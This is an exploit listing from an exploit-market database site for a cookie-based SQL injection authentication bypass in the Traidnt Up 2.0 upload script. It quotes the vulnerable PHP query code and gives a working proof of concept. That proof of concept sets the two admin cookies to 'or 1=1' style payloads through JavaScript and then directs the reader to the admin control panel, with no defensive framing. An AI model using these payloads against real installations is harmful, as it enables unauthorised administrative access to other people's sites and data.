[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Traidnt Up 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability

Author
Qabandi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5277
Category
web applications
Date add
28-05-2009
Platform
unsorted
=================================================================
Traidnt Up 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability
=================================================================


	From Kuwait PEACE
                      
=Vuln:		Traidnt Up version 2.0 (Auth Bypass / Cookie) SQL Injection Vulnerability
=INFO:		http://traidnt.net/vb/showthread.php?t=943260
=BUY:  		----
=DORK:		----


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-----------------Vulnerable-code:--adminquery.php------------------
if(isset($_COOKIE[trupuser])){

      $adminuser =  strip_tags($_COOKIE[trupuser]);<---not filtered properly
      $adminpassword = strip_tags($_COOKIE[truppassword]);

 	  $getadmin = $db->query("SELECT * FROM `admin` WHERE `admin`.`admin_user` = '$adminuser' AND `admin`.`admin_password` = '$adminpassword'  LIMIT 0 , 1 ");
   	  $issetadmin = $db->resultcount($getadmin);

   	  if($issetadmin == 1){ <---- Checks if SQL statement is true then give the OK.
-------------------------------------------------------------------
=-=--=-==-=-=-=-=-=-=PoC=-=-=-=----=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
Condition!: Magic_quotes_gpc == OFF!

APPLY THESE COOKIES:
Javascript:document.cookie = "trupuser=admin' or '1'='1;"
Javascript:document.cookie = "truppassword=Qabandi' or '1'='1;"

Go To:
./uploadcp/index.php

Enjoy Q_Q

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2024-11-16]  #